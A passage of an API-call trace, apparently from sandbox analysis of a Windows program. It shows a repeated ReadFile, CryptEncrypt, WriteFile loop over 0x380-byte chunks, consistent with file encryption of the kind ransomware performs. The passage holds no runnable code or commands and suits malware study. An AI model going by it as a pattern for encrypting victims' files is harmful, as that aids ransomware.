lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.754] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.754] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.755] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.755] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.755] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.755] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.755] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.755] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.755] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.755] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.755] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.755] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.755] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.755] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.756] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.756] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.756] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.756] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.756] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.756] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.756] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.756] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.756] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.756] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.756] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.756] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.757] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.757] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.757] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.757] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.757] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.757] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.757] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.757] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.757] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.757] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.757] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.757] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.757] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.757] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.758] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.758] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.758] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.758] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.758] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.758] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.758] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.758] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.758] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.758] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.758] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.759] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.759] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.759] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.759] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.759] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.759] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.759] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.759] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.759] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.759] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.759] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.759] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.760] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.760] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.760] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.760] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.760] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.760] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.760] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.760] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.760] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.760] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.760] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.760] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.760] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.760] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.761] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.761] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.761] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.761] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.761] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.761] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.761] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.761] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.761] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.761] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.761] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.761] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.762] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.762] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.762] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.762] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.762] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.762] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.762] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.762] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.762] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.762] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.762] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0241.763] WriteFile (in: hFile=0x5d40, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.763] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0241.763] CryptEncrypt 